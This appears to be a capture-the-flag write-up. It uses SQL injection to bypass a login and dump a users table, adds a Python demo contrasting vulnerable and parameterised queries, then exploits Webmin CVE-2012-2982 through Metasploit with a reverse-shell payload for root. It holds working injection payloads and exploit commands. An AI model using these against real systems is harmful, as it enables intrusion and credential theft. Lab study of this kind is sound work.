Universal-password login (SQL injection auth bypass)

' or 1=1 -- -
Haven't played in ages, forgot whether this is even allowed to be said (

Then a UNION-based injection through the searchitem parameter, three columns wide, walking information_schema from database names to table names to column names. The trailing `-- -` comments out the rest of the original query; MySQL needs whitespace after `--`, and the extra `-` keeps that space from being trimmed away.

searchitem=' union select 1,2,(SELECT group_concat(schema_name) FROM information_schema.schemata) -- -

searchitem=' union select 1,2,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'db') -- -

searchitem=' union select 1,2,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'db' AND table_name = 'users') -- -


Just pull the user and pwd columns straight out of the users table.
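The two injections above, the universal-password bypass and the staged UNION enumeration, replayed as an added example against an in-memory SQLite database, beside the parameterised queries that stop them. This is demo code written for this page, not the target's application or the write-up's own tooling. The schema, rows and the `items`/`users` table names are constructed for the demo; SQLite's `sqlite_master` and `pragma_table_info()` stand in for MySQL's `information_schema`, and the three-column `1,2,(...)` shape mirrors the payloads above.

```python
"""Added example: login bypass and UNION enumeration against SQLite,
next to the parameterised handlers that are immune to both."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a users table like the one dumped above."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (id INTEGER, user TEXT, pwd TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'agent47', 's3cret');
        CREATE TABLE items (id INTEGER, name TEXT, price TEXT);
        INSERT INTO items VALUES (1, 'knife', '10'), (2, 'wire', '5');
        """
    )
    return con


# --- vulnerable handlers: user input concatenated straight into the SQL ---

def login_vulnerable(con, user, password):
    sql = f"SELECT user FROM users WHERE user='{user}' AND pwd='{password}'"
    return [r[0] for r in con.execute(sql)]


def search_vulnerable(con, searchitem):
    # Three selected columns, so a UNION payload must supply exactly three.
    sql = f"SELECT id, name, price FROM items WHERE name LIKE '{searchitem}%'"
    return con.execute(sql).fetchall()


# --- hardened handlers: same queries, values bound as parameters ---

def login_safe(con, user, password):
    sql = "SELECT user FROM users WHERE user=? AND pwd=?"
    return [r[0] for r in con.execute(sql, (user, password))]


def search_safe(con, searchitem):
    sql = "SELECT id, name, price FROM items WHERE name LIKE ? || '%'"
    return con.execute(sql, (searchitem,)).fetchall()


# Payloads in the write-up's shape.  `-- -` comments out the trailing
# `' AND pwd='...'` / `%'` that the handler appends after the input.
BYPASS = "' or 1=1 -- -"
TABLES = ("' union select 1,2,(SELECT group_concat(name) FROM sqlite_master "
          "WHERE type='table') -- -")
COLUMNS = ("' union select 1,2,(SELECT group_concat(name) FROM "
           "pragma_table_info('users')) -- -")
DUMP = "' union select id,user,pwd FROM users -- -"


def enumerate_via_union(con):
    """Stage the enumeration: table names -> column names -> rows.
    Each UNION row comes back as (1, 2, <subquery result>); the real
    search contributes nothing because its pattern is '' before the comment."""
    tables = search_vulnerable(con, TABLES)[0][2]
    columns = search_vulnerable(con, COLUMNS)[0][2]
    rows = sorted(search_vulnerable(con, DUMP))
    return tables, columns, rows


if __name__ == "__main__":
    con = build_db()
    print("bypass ->", login_vulnerable(con, BYPASS, "x"))
    print("bypass (safe) ->", login_safe(con, BYPASS, "x"))
    print("enumeration ->", enumerate_via_union(con))
    print("enumeration (safe) ->", search_safe(con, TABLES))
```

The vulnerable login returns every user for the bypass string, and the vulnerable search hands back `users,items`, then `id,user,pwd`, then the credential rows, exactly the sequence the write-up walks through. The bound-parameter versions treat the same strings as literal values and return nothing, which is the only fix that matters here; escaping quotes by hand is not a substitute.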

SSH in.
Check listening sockets: ss -tulpn


Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:68 *:*
udp UNCONN 0 0 *:10000 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*

Obviously port 10000 is the interesting one (Webmin's default port). ss shows it bound on *:10000, i.e. all interfaces, but to be safe, forward it out over SSH:
ssh -L 10000:localhost:10000 agent47@10.10.8.98

CVE-2012-2982 (Webmin command injection in file/show.cgi; Metasploit module exploit/unix/webapp/webmin_show_cgi_exec)
But the forward from the previous step just wouldn't go through; I figured the box had died, no idea what was going on.
Damn, the box isn't dead.
Damn, had to fall back on frp after all.

A real hassle.

In msfconsole. rhost/rport point at the frp-forwarded endpoint on the attacker box rather than at the target directly, which is why rhost and lhost are the same address:

search CVE-2012-2982
use 0
set rhost 10.17.6.173
set rport 9003
set ssl false

set payload cmd/unix/reverse
set lhost 10.17.6.173
run

Got a root shell.
Done.